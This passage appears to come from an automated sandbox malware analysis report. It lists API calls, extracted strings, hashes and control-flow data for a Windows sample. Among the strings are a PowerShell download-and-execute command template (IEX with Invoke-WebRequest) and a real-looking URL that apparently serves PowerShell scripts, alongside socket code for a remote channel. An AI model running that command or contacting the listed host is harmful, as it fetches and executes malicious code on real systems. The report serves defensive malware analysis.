            • wnsprintfW.SHLWAPI ref: 02B87F24
            • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 02B87F60
            • wnsprintfW.SHLWAPI ref: 02B87F74
              • Part of subcall function 02B855D0: GetProcessHeap.KERNEL32(00000000,00000000,02B882C5), ref: 02B855D7
              • Part of subcall function 02B855D0: HeapFree.KERNEL32(00000000), ref: 02B855DE
            • GetModuleHandleA.KERNEL32(kernel32), ref: 02B87F97
            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 02B87FA5
            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 02B87FBA
            • LoadLibraryA.KERNEL32(shell32,ShellExecuteW), ref: 02B8801B
            • GetProcAddress.KERNEL32(00000000), ref: 02B88022
            • wsprintfA.USER32 ref: 02B88082
            • wnsprintfA.SHLWAPI ref: 02B880AE
              • Part of subcall function 02B827A0: GetProcessHeap.KERNEL32(00000008,?), ref: 02B827B2
              • Part of subcall function 02B827A0: HeapAlloc.KERNEL32(00000000), ref: 02B827B9
            • Sleep.KERNEL32(00000000), ref: 02B882D6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: HeapInternet$AddressProcwnsprintf$OpenOptionProcessSleepwsprintf$AgentAllocByteCharCombineConnectCount64DirectoryEnvironmentExpandFreeHandleHttpLibraryLoadModuleMultiObtainPathQueryRequestStringStringsSystemTickUserWidelstrcmp
            • String ID: -enc %S$ /c %S$%ComSpec%$%d|%s$%d|%s|%.16s|$%s|%s$INIT$ShellExecuteW$WindowsPowerShell\v1.0\powershell.exe$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$open$shell32
            • API String ID: 1920831074-1153165106
            • Opcode ID: feb8eb61bce300d7c81e7e176541bff41b43e1ca81f2352cbda2b63450fa6ed8
            • Instruction ID: f136ac735774d9c248cf60686b1a40e0a15712024e90267b836a415011035641
            • Opcode Fuzzy Hash: feb8eb61bce300d7c81e7e176541bff41b43e1ca81f2352cbda2b63450fa6ed8
            • Instruction Fuzzy Hash: 46C19171E002089BDB14FBB4CC44AEEB7BAAF44744F5405A9E90EE7291EB749E04CF91
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
              • Part of subcall function 008F3040: char_traits.LIBCPMTD ref: 008F3080
              • Part of subcall function 008F26F0: operator!=.LIBCPMTD ref: 008F27B9
              • Part of subcall function 008F26F0: task.LIBCPMTD ref: 008F27CA
              • Part of subcall function 008F26F0: task.LIBCPMTD ref: 008F27D9
              • Part of subcall function 008F2870: task.LIBCPMTD ref: 008F2889
              • Part of subcall function 008F2A60: task.LIBCPMTD ref: 008F2AB3
              • Part of subcall function 008F2A60: task.LIBCPMTD ref: 008F2AC2
            • task.LIBCPMTD ref: 008F2C96
              • Part of subcall function 008F2450: task.LIBCPMTD ref: 008F24E6
              • Part of subcall function 008F2450: task.LIBCPMTD ref: 008F24F2
              • Part of subcall function 008F2450: task.LIBCPMTD ref: 008F24FE
              • Part of subcall function 008F2450: task.LIBCPMTD ref: 008F250A
              • Part of subcall function 008F2450: task.LIBCPMTD ref: 008F2519
              • Part of subcall function 008F1BD0: task.LIBCPMTD ref: 008F1C63
              • Part of subcall function 008F1BD0: task.LIBCPMTD ref: 008F1C72
              • Part of subcall function 008F1D30: operator!=.LIBCPMTD ref: 008F1DB9
              • Part of subcall function 008F1D30: task.LIBCPMTD ref: 008F1DC7
              • Part of subcall function 008F1D30: task.LIBCPMTD ref: 008F1DD6
              • Part of subcall function 008F1E90: task.LIBCPMTD ref: 008F1F50
              • Part of subcall function 008F1E90: task.LIBCPMTD ref: 008F1F5F
              • Part of subcall function 008F1FF0: task.LIBCPMTD ref: 008F204A
              • Part of subcall function 008F1FF0: task.LIBCPMTD ref: 008F2056
              • Part of subcall function 008F1FF0: task.LIBCPMTD ref: 008F2065
              • Part of subcall function 008F2090: task.LIBCPMTD ref: 008F20E6
            • task.LIBCPMTD ref: 008F2E58
            • task.LIBCPMTD ref: 008F2EFC
              • Part of subcall function 008F21A0: operator!=.LIBCPMTD ref: 008F2294
              • Part of subcall function 008F21A0: task.LIBCPMTD ref: 008F22A5
              • Part of subcall function 008F21A0: task.LIBCPMTD ref: 008F22B4
            Strings
            • bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg, xrefs: 008F2CFB
            • bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs, xrefs: 008F2BAF
            • nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs, xrefs: 008F2DA3
            • jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd, xrefs: 008F2E97
            • ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund, xrefs: 008F2C12
            • sqfyhcibiyaixyvseuhuztdlx, xrefs: 008F2C6B
            • yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy, xrefs: 008F2E36
            • gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa, xrefs: 008F2D71
            • rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo, xrefs: 008F2DE8
            • syntqwezljesnhnfjaztdeotfzpejojodftab, xrefs: 008F2EB0
            • jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu, xrefs: 008F2D8A
            • fuisqwdbksjnkwghhwh, xrefs: 008F2CC8
            • brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis, xrefs: 008F2E7E
            • shtumcttjzvhu, xrefs: 008F2E65
            • upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs, xrefs: 008F2B5E
            • cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho, xrefs: 008F2E11
            • gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj, xrefs: 008F2ECF
            • rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb, xrefs: 008F2C52
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: task$operator!=$char_traits
            • String ID: bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg$bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs$brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis$ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund$cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho$fuisqwdbksjnkwghhwh$gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj$gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa$jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu$jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd$nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs$rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb$rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo$shtumcttjzvhu$sqfyhcibiyaixyvseuhuztdlx$syntqwezljesnhnfjaztdeotfzpejojodftab$upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs$yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy
            • API String ID: 1022754510-231213261
            • Opcode ID: be4372526f86c908797a9a916bbb3a5a5508dc3eb492f4b4139ddffbb25cde17
            • Instruction ID: bde7d69b5ac9c12056758b14a3bd1a4c3bd6765202d72d10a48c305a7e9e9823
            • Opcode Fuzzy Hash: be4372526f86c908797a9a916bbb3a5a5508dc3eb492f4b4139ddffbb25cde17
            • Instruction Fuzzy Hash: 05B12970E54B08AADB00FFBCCD167AEBB71BB86B04F404259E5417B2C1EB711A549B92
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 832 8f21a0-8f22bf call 8f3040 * 6 call 8f33d0 call 8f3020 * 2 851 8f22dd-8f22df 832->851 852 8f22c1-8f22c8 832->852 853 8f22fd-8f22ff 851->853 854 8f22e1-8f22e8 851->854 855 8f22d3-8f22d7 852->855 857 8f231d-8f2324 853->857 858 8f2301-8f2308 853->858 856 8f22f3-8f22f7 854->856 855->851 859 8f22d9 855->859 856->853 860 8f22f9 856->860 863 8f234e-8f23c3 call 8f3040 * 2 call 8f33d0 call 8f3020 * 2 857->863 864 8f2326-8f2330 857->864 861 8f2313-8f2317 858->861 859->855 860->856 861->857 867 8f2319 861->867 881 8f23ed-8f2448 call 8f3020 * 4 call 8f3a94 863->881 882 8f23c5-8f23cf 863->882 868 8f2341-8f2348 864->868 867->861 868->863 871 8f234a 868->871 871->868 884 8f23e0-8f23e7 882->884 884->881 886 8f23e9 884->886 886->884
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: task$char_traitsoperator!=
            • String ID: -$P$[$ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
            • API String ID: 2802545854-2318821752
            • Opcode ID: 9c07ea06c6ba74ccd1454c3da392bae1303cd04f78d5ae2bb472fa4d961c0f62
            • Instruction ID: b10b8f3751988a70081a2f12b099256c045d6dedd0e4dd1fdf78329fe4a3f579
            • Opcode Fuzzy Hash: 9c07ea06c6ba74ccd1454c3da392bae1303cd04f78d5ae2bb472fa4d961c0f62
            • Instruction Fuzzy Hash: E2711870D0466CCEDB24DBB8C9557AEBBB0FB54308F108199D249A7282DB745B88DF52
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 02B88521
            • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 02B88534
            • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 02B88547
            • GetFileAttributesW.KERNEL32(?), ref: 02B8856D
            • GetFileAttributesW.KERNEL32(?), ref: 02B88586
            • lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 02B8859D
            • wnsprintfW.SHLWAPI ref: 02B885C0
            • ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 02B885E2
            Strings
            • https://www.clubedasluluzinhasro.com.br/assets/image, xrefs: 02B885AA
            • %ComSpec%, xrefs: 02B88542
            • sd2.ps1, xrefs: 02B88578
            • %SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 02B8851C
            • open, xrefs: 02B885DB
            • /c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')", xrefs: 02B885AF
            • %SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe, xrefs: 02B8852F
            • sd4.ps1, xrefs: 02B88591
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: EnvironmentExpandStrings$AttributesFile$ExecuteShelllstrcpywnsprintf
            • String ID: %ComSpec%$%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe$%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe$/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"$https://www.clubedasluluzinhasro.com.br/assets/image$open$sd2.ps1$sd4.ps1
            • API String ID: 4132772799-1088483867
            • Opcode ID: f6423fdd5ec08f574ed461bbc88af4a328fdfb3a88c8688684be35329b749f62
            • Instruction ID: 1d87169596e8c1dd1af4f3cbe4451265e2b8d34082ad2f28dab2754a00f54e8b
            • Opcode Fuzzy Hash: f6423fdd5ec08f574ed461bbc88af4a328fdfb3a88c8688684be35329b749f62
            • Instruction Fuzzy Hash: 8221927195021CABEB10F6A88C45FEA77ACEB04758F4005D2F65DE2091E7B09685CF90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreatePipe.KERNEL32(?,?,?,00000000), ref: 02B856D3
            • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 02B85731
            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 02B85744
            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 02B85749
            • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 02B85760
            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 02B85777
            • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 02B857B4
            • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 02B857DF
            • HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 02B857E2
            • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 02B857ED
            • HeapReAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 02B857F0
            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 02B85847
            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 02B85863
            • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 02B85868
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: CloseHandleHeap$PipeProcess$AllocCreateNamedPeek$FileObjectReadSingleWait
            • String ID: D
            • API String ID: 2337985897-2746444292
            • Opcode ID: c2b2682e8bca0530bcc57f97c3957b47ff2302b3a11a4dbe2219956c75a1842d
            • Instruction ID: 50fb5ba62bfe29e50153c81be58bff650a8626e3aed4fc65b868c5a8c47483e3
            • Opcode Fuzzy Hash: c2b2682e8bca0530bcc57f97c3957b47ff2302b3a11a4dbe2219956c75a1842d
            • Instruction Fuzzy Hash: 6F519275E40219AFEB309FA5DC84FAE7BB9FF44748F1184A5E918E7280D7749804CB60
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • inet_pton.WS2_32(00000002,?,?), ref: 02B86270
            • htons.WS2_32(?), ref: 02B8628C
            • inet_pton.WS2_32(00000002,?,?), ref: 02B8629E
            • htons.WS2_32(?), ref: 02B862A5
            • socket.WS2_32(00000002,00000001,00000006), ref: 02B862B8
            • connect.WS2_32(00000000,?,00000010), ref: 02B862D3
            • socket.WS2_32(00000002,00000001,00000006), ref: 02B862E6
            • connect.WS2_32(00000000,?,00000010), ref: 02B862FB
            • closesocket.WS2_32(00000000), ref: 02B86303
            • select.WS2_32(00000000,?), ref: 02B86338
            • recv.WS2_32(?,?,00000400,00000000), ref: 02B86374
            • send.WS2_32(00000000,?,00000000,00000000), ref: 02B8639A
            • select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 02B863CC
            • closesocket.WS2_32(00000000), ref: 02B863E6
            • closesocket.WS2_32(00000000), ref: 02B863ED
            • GetProcessHeap.KERNEL32(00000000,?), ref: 02B863F9
            • HeapFree.KERNEL32(00000000), ref: 02B86400
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: closesocket$Heapconnecthtonsinet_ptonselectsocket$FreeProcessrecvsend
            • String ID:
            • API String ID: 2202494921-0
            • Opcode ID: 96ea6cc4bd478408554c38dc9d6c96fa19f12174d87743224e7c94f583a55f95
            • Instruction ID: fff6b47e59e8c1b60ea838c17634ced6a82650e643117d419f907b1302abc234
            • Opcode Fuzzy Hash: 96ea6cc4bd478408554c38dc9d6c96fa19f12174d87743224e7c94f583a55f95
            • Instruction Fuzzy Hash: 0A518F71544304ABD210AF68CC89B6EB7ECFF88B68F100A19F669DB1D1D7B0D845CB66
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 02B87141
            • lstrlenW.KERNEL32(?), ref: 02B8714A
            • ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 02B87165
            • GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 02B87173
            • GetLastError.KERNEL32 ref: 02B8717D
            • wnsprintfW.SHLWAPI ref: 02B87199
            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 02B871B5
            • wnsprintfW.SHLWAPI ref: 02B871CF
            • SetFileAttributesW.KERNEL32(?,00000006), ref: 02B871EF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: EnvironmentExpandStrings$wnsprintf$AttributesDirectoryErrorFileLastSystemWow64lstrlen
            • String ID: "%s"$%%ProgramData%%\r%Sr.js$%ProgramFiles%$%ProgramW6432%
            • API String ID: 2737787979-1095663237
            • Opcode ID: 732ab54fd881546a2f457c0b090e3e3ebc1bd10304ac7dc53d26b4f589c7a8ae
            • Instruction ID: 35e97aee679bc4be4b2aa37eabaf7b6b651189bfe9e055be214def80ec2e9e70
            • Opcode Fuzzy Hash: 732ab54fd881546a2f457c0b090e3e3ebc1bd10304ac7dc53d26b4f589c7a8ae
            • Instruction Fuzzy Hash: 1D1112B1D5020CABE710F7A4DC49EEA73ACBB04748F0405E5F61DD6451EAB09695CE51
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • inet_pton.WS2_32(00000002,?,?), ref: 02B87283
            • htons.WS2_32(?), ref: 02B8728E
            • socket.WS2_32(00000002,00000001,00000006), ref: 02B872A6
            • connect.WS2_32(00000000,?,00000010), ref: 02B872C4
            • recv.WS2_32(00000000,?,00000002,00000000), ref: 02B872DC
            • GetProcessHeap.KERNEL32(00000008,00000024), ref: 02B872FD
            • HeapAlloc.KERNEL32(00000000), ref: 02B87300
            • CreateThread.KERNEL32(00000000,00000000,Function_00006250,00000000,00000000,00000000), ref: 02B8737B
            • CloseHandle.KERNEL32(00000000), ref: 02B87386
            • recv.WS2_32(00000000,?,00000002,00000000), ref: 02B8739E
            • closesocket.WS2_32(00000000), ref: 02B873AD
            • GetProcessHeap.KERNEL32(00000000,?), ref: 02B873B6
            • HeapFree.KERNEL32(00000000), ref: 02B873B9
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B873D3
            • HeapFree.KERNEL32(00000000), ref: 02B873D6
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: Heap$Process$Freerecv$AllocCloseCreateHandleThreadclosesocketconnecthtonsinet_ptonsocket
            • String ID:
            • API String ID: 2784442062-0
            • Opcode ID: 93f1c16d308f8fbddea81b6556e4ab16bbf396bfcba4d8685ace0189d888ae4a
            • Instruction ID: 0f9fdf304f9b64f8534c2be73bdcf9976ad8bdfc7917b98b0d71481be4109486
            • Opcode Fuzzy Hash: 93f1c16d308f8fbddea81b6556e4ab16bbf396bfcba4d8685ace0189d888ae4a
            • Instruction Fuzzy Hash: C6410738A80305ABE720AB758C49B6ABB68FF0574CF245898FD1DDB181DB709482D7A1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            • hcndlsldtwhpkrlbisuiflvfeofcd, xrefs: 008F1EC5, 008F1F07, 008F1F24
            • fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv, xrefs: 008F1EF6
            • `, xrefs: 008F1F6C
            • gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb, xrefs: 008F1EDD
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: task$char_traits
            • String ID: `$fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv$gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb$hcndlsldtwhpkrlbisuiflvfeofcd
            • API String ID: 1455298312-2158094500
            • Opcode ID: 40ae5dfcd65ad3529a814fe38a56a6c6992994c3e3c821008fa5d067a74fab6e
            • Instruction ID: c9bdab7a5ff84890585836982b3a16bbdd3134dd325df8dbc0c44da2fb28f057
            • Opcode Fuzzy Hash: 40ae5dfcd65ad3529a814fe38a56a6c6992994c3e3c821008fa5d067a74fab6e
            • Instruction Fuzzy Hash: 8441153090468CDEDB04DBB8D969BEEBBB0FF51704F50419AA105BB2C2DB755B08CB66
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • ___free_lconv_mon.LIBCMT ref: 008FA108
              • Part of subcall function 008F9C2F: _free.LIBCMT ref: 008F9C4C
              • Part of subcall function 008F9C2F: _free.LIBCMT ref: 008F9C5E
              • Part of subcall function 008F9C2F: _free.LIBCMT ref: 008F9C70
              • Part of subcall function 008F9C2F: _free.LIBCMT ref: 008F9C82
              • Part of subcall function 008F9C2F: _free.LIBCMT ref: 008F9C94
              • Part of subcall function 008F9C2F: _free.LIBCMT ref: 008F9CA6
              • Part of subcall function 008F9C2F: _free.LIBCMT ref: 008F9CB8
              • Part of subcall function 008F9C2F: _free.LIBCMT ref: 008F9CCA
              • Part of subcall function 008F9C2F: _free.LIBCMT ref: 008F9CDC
              • Part of subcall function 008F9C2F: _free.LIBCMT ref: 008F9CEE
              • Part of subcall function 008F9C2F: _free.LIBCMT ref: 008F9D00
              • Part of subcall function 008F9C2F: _free.LIBCMT ref: 008F9D12
              • Part of subcall function 008F9C2F: _free.LIBCMT ref: 008F9D24
            • _free.LIBCMT ref: 008FA0FD
              • Part of subcall function 008F7FB2: HeapFree.KERNEL32(00000000,00000000,?,008F9DC0,?,00000000,?,?,?,008F9DE7,?,00000007,?,?,008FA25B,?), ref: 008F7FC8
              • Part of subcall function 008F7FB2: GetLastError.KERNEL32(?,?,008F9DC0,?,00000000,?,?,?,008F9DE7,?,00000007,?,?,008FA25B,?,?), ref: 008F7FDA
            • _free.LIBCMT ref: 008FA11F
            • _free.LIBCMT ref: 008FA134
            • _free.LIBCMT ref: 008FA13F
            • _free.LIBCMT ref: 008FA161
            • _free.LIBCMT ref: 008FA174
            • _free.LIBCMT ref: 008FA182
            • _free.LIBCMT ref: 008FA18D
            • _free.LIBCMT ref: 008FA1C5
            • _free.LIBCMT ref: 008FA1CC
            • _free.LIBCMT ref: 008FA1E9
            • _free.LIBCMT ref: 008FA201
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
            • String ID:
            • API String ID: 161543041-0
            • Opcode ID: 772135023a0a6eb8c271c0b3bb13eae883c9abeb684fb2954ba7b7528e3befa9
            • Instruction ID: 3621b8516091fbd49c4bb0c208e8b1a8842d1c881ace3a002b497054607ad78c
            • Opcode Fuzzy Hash: 772135023a0a6eb8c271c0b3bb13eae883c9abeb684fb2954ba7b7528e3befa9
            • Instruction Fuzzy Hash: FC312CB16083099FEB35AA3CD845B7AB7E9FF00320F118419EA5AD6151DE31EDC0C722
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
